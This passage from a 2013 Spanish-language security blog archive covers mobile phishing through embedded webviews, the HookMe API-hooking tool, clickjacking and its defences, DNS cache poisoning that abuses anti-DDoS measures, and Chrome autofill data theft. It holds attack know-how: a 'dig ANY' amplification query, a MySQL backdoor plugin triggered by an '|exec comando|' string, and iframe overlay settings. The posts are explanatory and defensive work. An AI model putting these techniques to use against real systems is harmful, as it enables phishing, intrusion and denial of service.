por ejemplo) y así el navegador oculta la barra de direcciones automáticamente, puesto que entiende que el usuario "ya ha tenido tiempo de verla". Las vistas incrustadas en las apps Algunas aplicaciones de redes sociales como Facebook, Tuenti, Twitter ( una app que iOS tuvo que arreglar específicamente no hace mucho), o los gestores de correo, utilizan vistas web embebidas con el fin de proporcionar comodidad al usuario y estética. "Incrustar" una web en una app se hace a través de los componentes UIWeb usados por plataformas como Android o iOS. Cargan la dirección URL enlazada desde la app, y por defecto no muestran la dirección URL en ningún lugar de la app. Esto podría ser utilizado por un atacante para hacer llegar un correo y, tras conseguir que acceda a la URL, presentar un sitio web falso. Desde la UIWeb, no podrá ser identificado en ningún punto. La app ofrecerá una falsa sensación de confianza en el contenido del sitio. A continuación se muestra un ejemplo, donde un atacante envía un email a una víctima haciéndose pasar por un banco. El usuario, tras visitar el enlace accede a través de la app a la vista web embebida y se puede visualizar el sitio web. La app no identifica en ningún momento la URL real visitada. Al visitar la URL aparece una vista incrustada en la aplicación de correo, sin barra de direcciones El ejemplo se ha realizado con la app de gmail para iOS. El atacante podría usar un acortador de direcciones (shortner) con el objetivo de que el usuario no conozca el destino real del enlace. El usuario podría no verse amenazado por acortadores, ya familiares por su uso en redes como Twitter. Los subdominios Otro problema de espacio que presentan las barras de direcciones en los navegadores móviles de los dispositivos es que suele desplazar la vista de forma que se muestran normalmente los subdominios más a la izquierda. Este detalle permite al phisher diseñar en su sitio web un subdominio con, por ejemplo, un formato como el siguiente www.mibanco.es.dominiomalicioso.com. En este caso, si se accede desde Android al sitio web se vería lo siguiente: Aunque no se observe, el dominio no es el real La URL se desplaza a la izquierda, por lo que el usuario no ve, en principio, el dominio real al que se está conectando. El usuario podrá pulsar sobre la barra de direcciones y visualizar la URL al completo. Esta técnica ya la usan los atacantes en navegadores "tradicionales", usando una gran cantidad de subdominios, pero en el móvil se acentúa el problema por la facilidad para ocultar el dominio final y real. Solo cuando se intenta editar la barra de direcciones, se aprecia el dominio en su totalidad Y qué ocurre con el SSL Se supone que el SSL, al igual que en el escritorio, debería ser la mejor defensa contra el phishing. ¿Lo ponen fácil en las versiones más ligeras del navegador? En general, si la conexión no está cifrada, la barra de direcciones ni siquiera muestra el protocolo por el que se navega. Si lo está, existen diferentes formas de visualizar la conexión que dependen de la plataforma: Sorprendentemente, no se puede ver información sobre el certificado en Safari para iPhone En Safari, en conexiones cifradas se muestra un candado de color azul, con el que se indica al usuario que navega mediante una conexión cifrada. No se muestra el protocolo en la barra de direcciones. Si se pulsa sobre el candado, no apacerá más información sobre el dominio o el certificado. En Safari también, un candado de color verde junto al título de la web indica al usuario que el certificado de la conexión es de validación extendida. El protocolo sigue sin mostrarse en ningún momento, tampoco más información cuando se pulsa sobre el candado. Esto facilitaría a los atacantes la creación de phishing puesto que con cualquier conexión SSL apacería el candado en la página falsa, que ofrecería confianza a la potencial víctima, sin posibilidad de comprobar realmente de dónde viene esa conexión supuestamente segura. Aquí, la vieja técnica de ofrecer seguridad a través del candado del navegador, tendría un efecto mayor. En Android (tanto en Chrome como en su navegador por defecto), las conexiones cifradas "normal" y las de validación extendida, se muestran de la misma forma. Sí que muestra el protocolo (a costa de que la URL apenas se vea), pero no hace distinción entre la calidad de los certificados (si son "normales" o de validación extendida). Android sí que muestra más información tanto de la URL como del certificado cuando se pulsa sobre él. En Android se puede ver más información sobre una conexión pulsando sobre el candado Pablo González pablo.gonzalez@11paths.com
7 de noviembre de 2013
HookMe, herramienta para interceptar comunicaciones con API hooking
Hookme es un programa para sistemas Windows que permite interceptar los procesos del sistema cuando llaman a las APIs necesarias para las conexiones de red. La herramienta, todavía en versión beta, fue desarrollada por Manuel Fernández (del actual equipo de Elven Paths) y Francisco Oca (que participó en el desarrollo de las primeras versiones de FOCA). La herramienta fue presentada en las ediciones de BlackHat Europe & USA 2013. Cuando se analiza malware, habitualmente se estudia el tráfico de red para comprender cómo se comunica con el exterior, qué información descarga, o qué órdenes recibe o envía. Normalmente este tipo de malware utiliza http o https para comunicarse, y las herramientas para conseguir "ver" ese tráfico son de sobra conocidas (actuando como man in the middle). Sin embargo, cierto tipo de malware más sofisticado puede llegar a utilizar un protocolo propio encapsulado bajo SSL y con verificación de certificado del servidor (si no se comunica con un servidor con un certificado específico que almacena en su código, se niega a continuar). Analizar de forma más cómoda el tráfico generado por este tipo de malware fue lo que motivó la creación de la herramienta, aunque se puede utilizar para otras finalidades, por ejemplo: Análisis y modificación de protocolos. Firewall de aplicación (gracias a los filtros on the fly que se pueden aplicar). Herramienta de post-explotación para la creación de puertas traseras (inyección de malware sobre el protocolo de red de una determinada aplicación). API Hooking A grandes rasgos, la técnica de "hooking" consiste en interceptar la comunicación entre distintos procesos, ya sean llamadas a funciones, eventos o mensajes. En el caso de HookMe, el hook se realiza entre las llamadas que un determinado proceso hace a las API de envío y recepción de datos. A la hora de realizar un hook a una determinada llamada, existen varias técnicas. Las más conocidas son el "AIT Hooking" y el "InLine Hooking". La segunda es la técnica utilizada por HookMe. Consiste en modificar el código de la función que se desea hookear y realizar un salto a otra porción de código antes de ejecutar el código original. Esta modificación suele ser un salto incondiciona (JMP) que apunta a otra dirección de memoria en la que se implementan las acciones que realiza el hook. En las siguientes figuras se muestran el antes y el después de realizar un hook a un proceso sobre la API send en la librería WS2_32.dll. Código de la función "send" antes y después de añadir el hook Como se observa, la dirección de memoria donde empieza la función send comienza en 0x71A34C27 y contiene un MOV EDI,EDI. Esta instrucción es remplazada por un salto incondicional (JMP) a la dirección 0x0576000. En esa dirección se encontrarán las instrucciones (el código) de control del hook. El programa, para solucionar potenciales problemas de cambios en las direcciones de las funciones, hace uso de la conocida librería Nektra Deviare2. Las API de envío en Windows El propósito de ‘HookMe’ es interceptar las llamadas a las API de envió y recepción de datos a través de red. Las que cumplen con este propósito en Windows son: send (WS2_32.dll) sendto (WS2_32.dll) recv (WS2_32.dll) recvfrom (WS2_32.dll) WSASend (WS2_32.dll) WSARecv (WS2_32.dll) EncryptMessage (Secur32.dll) DecryptMessage (Secur32.dll) Las seis primeras APIs se encargan del envío y recepción de datos de red en diferentes formas. Las dos últimas ( EncryptMessage y DecryptMessage) tienen otra finalidad. Proporcionan a las aplicaciones una forma sencilla de llevar a cabo el cifrado y descifrado de datos, y soportan una gran cantidad de algoritmos criptográficos. El hook a estas dos API se realiza para poder acceder a los datos directamente sin importar que sean posteriormente enviados a través de un canal seguro como puede ser SSL. Hookme, al interceptar estas llamadas, posibilita al usuario el visualizar y modificar la entrada y salida de esas funciones, incluso los datos en claro de conexiones SSL que hacen uso de la CryptoAPI de Windows. Esto es posible porque estos datos son interceptados junto antes de ser cifrados o justo después de ser descifrados. En el ejemplo de la imagen, se observa cómo la interfaz muestra en texto plano una petición que va a ser enviada a través de HTTPS. El contenido que se muestra es el que va a ser cifrado. La interfaz Para llevar a cabo los distintos hooks, la aplicación implementa una interfaz gráfica que permite atachearse (interceptarlo y poder modificar su comportamiento) a un proceso. Antes, es recomendable seleccionar las API que se desean interceptar. Esto es posible configurarlo desde el panel situado en "Configuration, Hooks". Una vez hookeada una llamada, desde la interfaz de usuario es posible interceptar las llamadas o dejarlas pasar mediante el botón Intercepting is ON / Intercepting is OFF. En caso de que se intercepte una de ellas, el programa mostrará en la aplicación el contenido de la llamada tanto en formato hexadecimal como en texto (ANSI). Desde esta ventana es posible modificar su contenido antes de que sea enviado a la API, o antes de que la API le devuelva los datos a la aplicación (en los casos en los que la API devuelva valores de retorno). En la captura anterior se puede observar cómo se está interceptando la comunicación de la aplicación HeidiSQL (Un cliente con interfaz gráfica para Windows de MySQL). En ella podemos ver el paquete de autenticación del cliente sobre el servidor. En el offset 0x24 se observa el usuario ‘ root’, y en el 0x29 el hash de la contraseña introducida. Otra de las características de HookME es la posibilidad de aplicar reglas de remplazo on the fly sin necesidad que el usuario interactúe, por lo que sería un proceso totalmente transparente y automático. Para ello es posible ir a la pestaña Match and replace y hacer clic con el botón derecho para pulsar en Add. Se abrirá una nueva ventana en la que se puede especificar la regla que se desea aplicar. Una vez aplicada la regla de remplazo podremos ver como al realizar la consulta SQL Select ‘hello :)’ se recibe en respuesta la cadena “ 11 Paths”. Con estos cambios se podrían implementar cortafuegos de aplicación que mejoraran su seguridad filtrando ciertos parámetros que podrían resultar peligrosos. Una característica importante es el soporte de plugins desarrollados en Python. Estos plugins pueden crearse con diferentes finalidades, como almacenar la comunicación en disco, modificar tráfico, modificar certificados, firewalls a nivel de aplicación, etc. En la siguiente captura de pantalla se muestra la interfaz desde la que se cargan los plugins, así como una pequeña interfaz de Python integrada dentro de la aplicación. Se han creado algunas plantillas de ejemplo las disponibles en: https://code.google.com/p/hookme/source/browse/trunk/hookme/hook/Scripts/. Entre ellas se encuentra el plugin MySQL_Backdoor.txt, que fuerza a HookMe a attachearse al proceso mysqld.exe y espera a la escucha por un paquete especialmente formado. En este caso busca por la cadena "|exec comando|". Esta cadena puede ser enviada como nombre de usuario durante el proceso de autenticación, por ejemplo. A continuación se muestra un vídeo a modo de demostración de la aplicación y de este plugin: http://youtube.googleapis.com/v/ZviZxxzMUlQ&source=uds La herramienta se puede descargar libremente. La licencia y más detalles están disponibles desde su página oficial https://code.google.com/p/hookme/ Manuen Fernández manuel.fernandez@11paths.com
4 de noviembre de 2013
Algunos ejemplos y defensas contra el clickjacking
El clickjacking fue descubierto por Jeremiah Grossman y Robert Hansen en 2008. También se le conoce como UI redressing. El concepto es sencillo, y las técnicas para conseguirlo no son difíciles de implementar. Se podría decir que la técnica se basa en un fallo de diseño de HTML y por tanto toda web es "vulnerable" por defecto. Las soluciones hasta ahora son en realidad "parches" aplicados tanto al protocolo como a los navegadores, que han aparecido para intentar mitigar el problema. El fin del clickjacking es conseguir que un usuario pulse en un enlace (y realice una acción) sin que lo sepa, o creyendo que lo hace en otro enlace con otro fin, con todas las consecuencias que eso puede acarrear. Puede ser un enlace de votación (que vote a alguien que no desea), seguir a alguien en Twitter, un "Me gusta" de Facebook... El atacante "disfraza" un enlace no deseado, volviéndolo atractivo para la víctima. Para conseguirlo, se basa en el juego de capas que se puede conseguir con HTML e "iframe". Iframe es una (anticuada en cierta forma) técnica para cargar una web dentro de otra. Clickjacking está basado normalmente en el iframe. Para una explicación de cómo realizar este ataque, se debe entender el funcionamiento por capas intrínseco al HTML. Una web maliciosa (roja, en la figura) debe cargar una web legítima (gris) delante pero , de forma transparente (con opacidad cero). La web roja consistirá en un mensaje atractivo, en el que el usuario desee pinchar. La web legítima será la "víctima" en el sentido de que el usuario realmente pulsará sobre ella sin quererlo. Además, será víctima del ataque porque permite que se "abuse" de ella (veremos cómo evitarlo). Si se posiciona correctamente un enlace sobre otro, y se cuadran las capas, el efecto puede ser el del "secuestro" del clic del ratón. Para preparar la página maliciosa, el atacante debe contar con dos componentes básicos: Un iframe a cualquier otra página, que en este caso será la "víctima", o en rigor, la página que será finalmente pulsada, sin que lo sepa el usuario. Este iframe debe servirse desde la página maliciosa aplicando un estilo concreto que permita que sea transparente y quede posicionada por delante, en el punto correcto. Por ejemplo El "style" definirá el ataque. opacity:0. Vuelve transparente al elemento. Su valor va de 1 (totalmente opaco) a 0, transparente e invisible. position: El elemento se coloca en relación a su primera posición (no estática) elemento antecesor. top:0px;left:0px;width:99%;height:95%;margin:0px;padding:0px. Estos parámetros permiten tomar todo el ancho de una página y que se acople a sus márgenes para que la cubra totalmente z-index:1. Permite que se posicione por delante/encima de cualquier otro elemento. Si este número se incrementa (puede valer 100, por ejemplo), se posicionará delante de todo lo que tenga un z-index menor. Si el número es negativo, se posicionará por detrás. El ataque completo, podría ser algo así: Y cuando el usuario crea pulsar sobre un enlace muy atractivo o conveniente para él, en realidad puede que esté realizando una transferencia, por ejemplo. Una ventaja de esta técnica que la diferencia del CRSF (cross site request forgery), es que con ella se sigue disponiendo del token válido en el caso de páginas que necesiten sesión, y si el usuario está presentado en la web "víctima", lo hará con el mismo token y como si realmente la acción se hubiera realizado desde la página original. Pero se puede ir más allá. El problema inicial se definió en 2008 con este vídeo, en el que se presentaba un ejemplo en el que la víctima activaba inadvertidamente su cámara web al presionar botones en la propia página de Adobe. http://youtube.googleapis.com/v/gxyLbpldmuU&source=uds Un ejemplo concreto Imaginemos un sistema de votación muy sencillo, alojado en un dominio culaquiera, en la web vulnerable.php. El atacante utiliza test.html, que carga mediante un iframe la página vulnerable.php de forma transparente con opacidad 0. La carga "por delante" de test.htm, pero al ser transparente, el usuario solo visualiza el contenido de test.html. En ella propone votar a otra web cualquiera, por ejemplo elladodelmal.com. Este es el reclamo. Pero el usuario que pulse sobre el botón, realmente estará votando a elevenpaths.com. La última secuencia muestra una imagen de la aplicación test.htm con opacidad 1, lo que significa que se puede ver la aplicación vulnerable.php y test.php claramente una sobre la otra. Evitar el ataque: en un sitio web ¿Qué puede hacer una página para que no sea utilizada como víctima del clickjacking? No puede hacer mucho más que evitar que se cargue ella misma dentro de un iframe. Así ningún atacante podrá ponerla "invisible" y sobre otra que el propio atacante ha creado. Una de las soluciones "antiguas" era la de evitar con JavaScript que una página no estuviera siempre en el "top". Se debería incluir este código en cada página. Pero estas técnicas podían, a su vez, ser evitadas por el atacante. Como solución más práctica, se ideó añadir al protocolo HTTP una cabecera llamada X-Frame-Options. Las páginas que envíen estas cabeceras al navegador, pretenden protegerse de aparecer en un iframe. Se propusieron varios métodos más o menos flexibles para intentar ayudar a las que legítimamente necesitaran incluirse dentro de un iframe. Sus valores son: DENY, el navegador evita que la página sea renderizada si está contenida dentro de un iframe SAMEORIGIN, la página solo puede ser mostrara en un frame que provenga del mismo origen que la propia página. ALLOW-FROM uri, el navegador bloqueará la renderización sólo si el origen de nivel superior está en un contexto de navegación que es diferente al valor uri proporcionado en la directiva Los usuarios deben confiar en que las páginas las envíen, y que su navegador las interprete correctamente. Esto último hace tiempo que ya lo implementan la mayoría. Por ejemplo, Chrome desde su versión 4.1.249.1042, Firefox desde 3.6.9, Internet Explorer desde la 8, Opera desde la 10.5... Evitar el ataque: desde el cliente Pero aunque la mayoría de páginas ya se aprovechan de estas cabeceras, ¿qué pasa con las que no? El usuario debe protegerse. Ciertos antivirus detectan en el navegador comportamientos "extraños" de este tipo, y les han asignado firmas. Por ejemplo Avira, lo detecta como HTML/Infected.WebPage.Gen2. Otro método para protegerse es utilizar la funcionalidad "clearclick" del conocido plugin NoScript, que ofrecerá protección al usuario para FireFox. Ejemplos de alertas sobre ClickJacking. Fuente: http://blogs.computerworld.com/sites/default/themes/cw_blogs/cache/files/u91/noscript_clickjack.jpg Fuente: http://hackademix.net/2008/10/08/hello-clearclick-goodbye-clickjacking/ Ricardo Martín Rodríguez ricardo.martin@11paths.com
29 de octubre de 2013
¿De verdad se ha encontrado malware para Firefox OS?
El poder de un buen titular es hipnótico. El que copa muchas noticias de seguridad estos días es el "descubrimiento del primer malware para Firefox OS". El título es atractivo, pero ¿es correcto? El desarrollo de la noticia invita a la reflexión sobre qué ha ocurrido exactamente, en qué consiste el "descubrimiento" y por qué todavía no se han superado ciertos mitos. Firefox OS es un reciente sistema operativo basado en web. Todos sus programas son web, creados a partir de JavaScript, CSS3 y HTML5. Esto implica que las aplicaciones se puede distribuir de dos formas: En un zip que lo contenga todo, o a través de una URL que la aloje y se visite. Un chico de 17 años ha creado una prueba de concepto de malware para Firefox OS. Presentará sus investigaciones en una convención en noviembre. Dice que su aplicación permite realizar ciertas acciones potencialmente no deseadas sobre el dispositivo de forma remota, controlándolo a través de comandos. Primero, el modelo de seguridad Según el modelo de seguridad de Firefox OS "Se basa en una estrategia de seguridad en profundidad para proteger al dispositivo de aplicaciones maliciosas. Se utilizan diferentes mecanismos que incluyen niveles implícitos de permisos basados en un modelo de confianza en la app, sandbox en tiempo de ejecución, acceso a través de APIs al hardware, un sistema de permisos robusto y un sistema de instalación y actualización seguro". Hasta aquí (exceptuando la forma en la que se accede al hardware), nada que no implementen todos (y nada que impida realmente "infecciones"). https://developer.mozilla.org/en-US/docs/Mozilla/Firefox_OS/Security/Security_model Algo que diferencia en cierta forma a Firefox OS es cómo clasifica los permisos de las apps. Las habrá de tres tipos: Certificadas: las que instale el fabricante y las críticas para la funcionalidad básica del teléfono (teléfono, SMS, bluetooth, reloj, cámara...). Tendrán acceso a todas las APIs. Por ejemplo, solo las apps certificadas (que son las que vienen con el dispositivo) podrán acceder a la API de teléfono y realizar llamadas. Privilegiadas: las revisadas, aprobadas y firmadas digitalmente por un market autorizado. Tendrán acceso a un subconjunto de APIs menor que las certificadas. No confiables: El resto, que no estarán en un market. A estas se les deja solo acceso a un subconjunto de APIs que se entiende no entrañan peligro. Veamos ahora qué es lo que se puede deducir del anuncio del programa creado por Shantanu Gawde. Diferenciar entre el qué y el cómo Un chico ha creado una aplicación que realiza acciones no deseadas en el sistema. Habla literalmente de "infectar" y de "controlar como una botnet". De enviar comandos para acceder a la tarjeta SD, de "asustar al usuario controlando la radio FM", "subir y bajar ficheros multimedia". Da la sensación de poder controlar ciertas aplicaciones del dispositivo, pero no sabemos hasta dónde. Descripción oficial de la charla en http://g0s.org/key-focus-areas/ ¿Es esto malware? Depende. Habrá aplicaciones legítimas que necesiten acceder a datos en la SD, a los contactos, etc. Se les permitirá porque el usuario normalmente confiará en el fabricante/programador. Como bien describe el documento sobre seguridad de Firefox OS, existe un modelo basado en la confianza en la aplicación. Lo que llama la atención es el control de aplicaciones ajenas (habla de controlar la radio). También invita a llamarlo "malware" que el se hable de "enviar comandos", aunque una vez la aplicación está instalada, parece sencillo enviar comandos... así que en general el problema no es tanto qué haga esa prueba de concepto que se ha creado sino cómo lo hace, cómo llega a disponer de esos permisos o cómo ha conseguido hacerlo. Por lo poco que sabemos, suponemos que el usuario lanza una aplicación alojada en un servidor, y esta realiza ciertas acciones que pueden ser potencialmente no deseadas por el usuario. Más preguntas que respuestas Pero para conocer el verdadero alcance del anuncio, deberíamos responder estas cuestiones. ¿El programa creado es capaz de eludir alguna medida o de seguridad de Firefox OS? Esto incluiría elevar privilegios, acceder sin permiso a APIs privilegiadas, evitar diálogos, advertencias que pudieran prevenir al usuario... cualquier método que implique eludir, romper u obviar un modelo de seguridad de Firefox OS. Parece que sí, pero no queda claro. ¿El malware se replica de alguna forma, por ejemplo aprovechando alguna vulnerabilidad o debilidad de diseño? Parece que no. Si Gawde hubiera encontrado una forma de propagar un programa sin apenas interacción humana, la noticia sería más inquietante. Pero por los datos revelados, no parece el caso. ¿El malware se esconde de alguna forma, por ejemplo en apps legítimas? Tampoco parece el caso. Hubiera sido interesante si se declara una forma de lanzar aplicaciones ocultas o incrustadas en otras, tal como hacían los primeros "virus". A lo que sí se presta Firefox OS fácilmente, es a que URLs confusas u ofuscadas oculten aplicaciones que se lanzan solo con visitarlas... y eso sí es un problema grave del que se lleva alertando desde hace tiempo. ¿Se debe dar alguna circunstancia especial para que funcione la prueba de concepto? ¿Ocurre solo en algunos dispositivos, con la configuración por defecto, o es necesario mantener activo algún servicio, aplicación...? ¿Se abusa de alguna técnica para ocultar su ejecución al usuario? Algo que llama la atención es que el propio descubridor afirma que "no hay forma de detectar los ataques ni de detenerlos". Las afirmaciones tan contundentes en seguridad suelen ser desafortunadas. Entendemos que se refiere a un modelo en el que se visita una URL que resulta una aplicación y comienza, sin interacción por parte del usuario, un intercambio de información entre la "víctima" y un atacante que puede ejercer poder sobre el dispositivo. Sin estas respuestas (entre otras), la información solo puede basarse en la especulación. Y el creador podría haberlas respondido de antemano en su anuncio, como hacen otros investigadores, para entender (sin necesidad de dar detalles técnicos) cómo lo ha conseguido, sin poner tanto el énfasis en qué efecto ha conseguido. Destacar que ha explicado que su prueba de concepto tiene como fin último "concienciar a desarrolladores" y no "inspirar" a atacantes. Aunque en realidad, la aparición de "malware" (este u otro) no pillará por sorpresa. En el momento en el que se permite la ejecución de aplicaciones no controladas y "markets" alternativos, su abuso está prácticamente garantizado. Aunque sea a través de aplicaciones restringidas, muchas no necesitarán permisos para infectar con "adware" y mostrar publicidad, y otras puede que encuentren métodos para saltarse los permisos, a través de vulnerabilidades o fallos de diseño. Un portavoz de Firefox OS afirma que posiblemente, Gawde ha usado el modo desarrollador, desactivado por defecto en el equipo y que incluso piensan que requiere que el dispositivo esté conectado a un ordenador y desbloqueado. En otras palabras, creen que ha hecho "trampa". Lógicamente, su interés es quitar hierro al asunto a falta de más información. Concluyendo, sin más datos en la mano, el titular debería ser que posiblemente, un investigador ha encontrado un fallo de diseño o una forma de eludir cierta seguridad de Firefox OS, realizando acciones privilegiadas de forma remota. Pero no podemos estar totalmente seguros. Lo que sí es seguro es que hablar de "malware" confunde al usuario final, que se sentirá amenazado sin motivo aparente... todavía. Sergio de los Santos ssantos@11paths.com @ssantosv
23 de octubre de 2013
DNS poisoning gracias a los sistemas de protección anti-DDoS
Un método habitual para mitigar los ataques de denegación de servicio distribuido basados en la amplificación DNS, se sustenta en ignorar ciertos mensajes cuando se sospecha que son consultas destinadas a generar un ataque. Pero esta técnica destinada a mitigar los ataques DDoS, pone en riesgo a los servidores que los utilizan, porque facilita a un atacante envenenar la caché de los servidores DNS que la usan. Vamos a explicarlo en detalle. El protocolo DNS en general siempre ha sido el punto débil en la red. Ataques de spoofing con diferentes técnicas, cachés envenenadas, la vulnerabilidad de Kaminsky (que es un problema de diseño intrínseco al protocolo), los fallos propios y vulnerabilidades de implementación de BIND... Su importancia, sencillas características y falta de seguridad se prestan a todo tipo de abusos. Últimamente el protocolo DNS está siendo usado para realizar ataques DDoS aprovechando la amplificación de tráfico. Pero en ciertos casos, parece que el remedio aplicado es peor que la enfermedad, porque facilita el envenenamiento de caché. Así lo han demostrado Florian Maury y Mathieu Feuillet en su investigación "Blocking DNS Messages is Dangerous". Amplificación DNS Hasta hace relativamente poco, para "tumbar" páginas web importantes bastaba con tener una botnet lo suficientemente grande como para generar el tráfico necesario. Pero la "globalización" de servicios y mejora de los sistemas DDoS en general, hacen que cada vez sea más complejo para un atacante disponer de los bots mínimos para causar daño. Así que necesitan "amplificar" ese tráfico que generan para poder atacar. Esto lo conseguían en los 90 con ataques tipo "smurf", pero actualmente (el ICMP era fácil de capar) se usa sobre todo el DNS. Tanto ICMP como UDP permiten falsificar al emisor y sobre todo, generar respuestas "muy grandes" a consultas muy pequeñas. Así, lo que los atacantes hacen es: Envían una petición pequeña (pocos bytes) desde muchas máquinas, falsificando la dirección de origen y haciendo pensar que las realiza la víctima. Hago así como dig ANY microsoft.com @195.5.64.2 Las envían a servidores DNS abiertos, que resuelven cualquier petición. Estos servidores DNS reciben las miles de pequeñas preguntas y devuelven las miles de respuestas gigantescas (hasta 50 veces más bytes que la pregunta) a la víctima, que recibe un tráfico muy grande que no ha solicitado. Algo así como esta respuesta por cada pregunta: ; <<>> DiG 9.7.0-P1 <<>> @195.5.64.2 microsoft.com ANY +norecurse ; (1 server found) ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 2663 ;; flags: qr ra; QUERY: 1, ANSWER: 11, AUTHORITY: 5, ADDITIONAL: 7 ;; QUESTION SECTION: ;microsoft.com. IN ANY ;; ANSWER SECTION: microsoft.com. 3591 IN TXT "FbUF6DbkE+Aw1/wi9xgDi8KVrIIZus5v8L6tbIQZkGrQ/rVQKJi8CjQbBtWtE64ey4NJJwj5J65PIggVYNabdQ==" microsoft.com. 3591 IN TXT "v=spf1 include:_spf-a.microsoft.com include:_spf-b.microsoft.com include:_spf-c.microsoft.com include:_spf-ssg-a.microsoft.com include:spf-a.hotmail.com ip4:131.107.115.215 ip4:131.107.115.214 ip4:205.248.106.64 ip4:205.248.106.30 ip4:205.248.106.32 ~all" microsoft.com. 3591 IN SOA ns1.msft.net. msnhst.microsoft.com. 2013101607 300 600 2419200 3600 microsoft.com. 2244 IN A 64.4.11.37 microsoft.com. 2244 IN A 65.55.58.201 microsoft.com. 3591 IN MX 10 microsoft-com.mail.protection.outlook.com. microsoft.com. 172791 IN NS ns3.msft.net. microsoft.com. 172791 IN NS ns4.msft.net. microsoft.com. 172791 IN NS ns1.msft.net. microsoft.com. 172791 IN NS ns5.msft.net. microsoft.com. 172791 IN NS ns2.msft.net. ;; AUTHORITY SECTION: microsoft.com. 172791 IN NS ns5.msft.net. microsoft.com. 172791 IN NS ns1.msft.net. microsoft.com. 172791 IN NS ns4.msft.net. microsoft.com. 172791 IN NS ns2.msft.net. microsoft.com. 172791 IN NS ns3.msft.net. ;; ADDITIONAL SECTION: ns1.msft.net. 993 IN A 65.55.37.62 ns2.msft.net. 2540 IN A 64.4.59.173 ns3.msft.net. 993 IN A 213.199.180.53 ns4.msft.net. 993 IN A 207.46.75.254 ns4.msft.net. 2629 IN AAAA 2404:f800:2003::1:1 ns5.msft.net. 3124 IN A 65.55.226.140 ns5.msft.net. 943 IN AAAA 2a01:111:200f:1::1:1 ;; Query time: 905 msec ;; SERVER: 195.5.64.2#53(195.5.64.2) ;; WHEN: Thu Oct 17 10:34:30 2013 ;; MSG SIZE rcvd: 832 Se han encontrado incluso scripts PHP colgados en páginas comprometidas que facilitan esta labor. http://www.webroot.com/blog/2013/09/10/web-based-dns-amplification-ddos-attack-mode-supporting-php-script-spotted-wild/ Recursivo e iterativo Además de la botnet y las peticiones falsificadas, los atacantes necesitan "resolvedores" que se presten a este juego amplificando el tráfico. Los servidores configurados como recursivos públicamente (se estima que existen sobre el millón accesibles en la red) son los nuevos servidores de correo que permitían el "open relay" de los 90, y contra ellos se está luchando. Servidor DNS actuando en modo modo iterativo Un servidor DNS opera en general en dos modos: Modo iterativo: El usuario pregunta al servidor DNS por un dominio. Si no lo tiene, lo deriva a otro DNS (un root, por ejemplo) que lo sepa y deja que pregunte él mismo. En resumen, le envía un "referral" y que sea el cliente el que trabaje, preguntando varias veces. Ambos comparten el "esfuerzo" de generar y recibir tráfico. Modo recursivo: El servidor DNS, si no sabe cómo resolver un dominio, se ocupa de todo. Pregunta al servidor root, hasta llegar al autoritativo del dominio, recopilar toda la información, y devolvérsela al cliente. Así el tráfico está mal repartido. Al cliente le hacen todo el trabajo y, con pocos bytes, consigue que se devuelva una respuesta enorme. Si además se falsifica la fuente... el DDoS está servido. Desde hace pocos años BIND cambió su configuración por defecto para intentar mitigarlos. Esquema de ataque con el servidor DNS actuando en modo recursivo El modo recursivo tiene su utilidad en redes internas en los que los usuarios solo acceden a un DNS corporativo y no pueden consultar a otros... pero si se administra mal y no se limita para este servidor recursivo solo responda a las IPs de su LAN... nos encontramos con que los atacantes disponen de servidores de los que abusar. El ataque Se basa en buena parte en el problema descubierto por Kaminsky en 2008, que permitía engañar a la caché de un servidor DNS. Muy simplificado, se enviaban muchas respuestas falsas a preguntas que nunca hizo el servidor. Si alguna coincidía en el puerto de origen con una pregunta, el servidor devolvía la respuesta falsa como verdadera a la víctima. El problema encontrado por Kaminsky se resolvió introduciendo más entropía al cálculo del puerto fuente en la respuesta. Desde entonces las probabilidades de que coincidan son tan bajas que el ataque no resulta práctico. Lo que pensaron estos investigadores es que, si el problema es que existe mucha entropía, quizás con más tiempo para probar más posibilidades, podrían volver a conseguir que el ataque de Kaminsky fuera viable. Y así fue. Si se ayudan de los mecanismos anti-DDoS, es posible que el ataque de envenenamiento de caché sea práctico de nuevo. Fundamentalmente, los métodos anti-DDoS abren una ventana de tiempo que puede ser aprovechada por el atacante. Lo que ocurre es que: El atacante, desde cualquier punto, envía una petición de resolución al servidor DNS del que se va ayudar, y que dispone de un sistema anti-DDoS. Este servidor DNS realiza la recursión, preguntando al servidor autoritativo del dominio que corresponda, porque él no sabe la respuesta. La botnet del atacante avisa deliberamente al servidor autoritativo, diciéndole que ese servidor DNS está siendo usado para amplificar, y que active sus mecanismos de protección que fundamentalmente consisten en que ignore a ese servidor DNS que le pregunta: que no le responda o que lo haga más tarde. Mientras el servidor espera, el atacante le envía ataques Kaminsky al servidor (respuestas falsas que cacheará), porque tiene tiempo de sobra para hacerlo. El servidor cree que vienen del servidor autoritativo y las cacheará. El ataque de envenenamiento puede ser otro, pero ellos han usado Kaminsky, por resultar un problema de diseño intrínseco al protocolo DNS. En resumen, aprovechar ese tiempo de "baneo" para enviar masivamente respuestas y aumentar las probabilidades de éxito en el envenenamiento de caché. En realidad, es vulnerable cualquier dispositivo que, queriendo usar DNS "Response Rate Limiting" para precisamente evitar ataques, llegue a desestimar peticiones DNS por considerarlas peligrosas. Incluso ciertos cortafuegos. La solución a todo problema de DNS es DNSSEC, pero como no es probable que se instaure a corto plazo... la contramedida ofrecida es responder a todos los paquetes, incluso si es con un "REFUSED", pero nunca dejar esperando al servidor simplemente ignorando sus consultas. Sergio de los Santos ssantos@11paths.com @ssantosv
17 de octubre de 2013
Cómo aprovechar el autofill de Chrome para obtener información sensible
A finales de 2010, Google introdujo en Chrome autofill, una característica cómoda, pero que puede suponer un problema de seguridad para sus usuarios. Incluso después de que otros navegadores sufrieran problemas de seguridad relacionados con esta funcionalidad, y que la funcionalidad en sí haya sido cuestionada, sigue siendo posible robar la información almacenada del usuario que rellena un formulario sin que lo perciba. En general, almacenar datos sensibles en el navegador no suele resultar una buena idea. Justo antes de que Chrome implementara el "Autofill", en verano de 2010, se descubrió cómo sacar todos los datos almacenados en Safari con fuerza bruta en JavaScript. El usuario rellenaba un campo pero el navegador se encargaba de rescatar todos los demás almacenados, probando todas las letras y dejando que el navegador hiciera el resto. La vulnerabilidad fue parcheada poco después. No hace tanto, en agosto de 2013, se criticó desde muchos frentes lo sencillo que era recuperar contraseñas almacenadas en Chrome, que podían observar en texto plano. Con un sencillo método se puede conseguir que el usuario que escribe en un formulario, entregue esos datos a un tercero sin que sea consciente de ello. ¿Cómo funciona? Autofill de Chrome permite almacenar la dirección postal (dividida en otros datos como nombre, apellidos, teléfono, código postal...) y la tarjeta de crédito (dividida en titular, 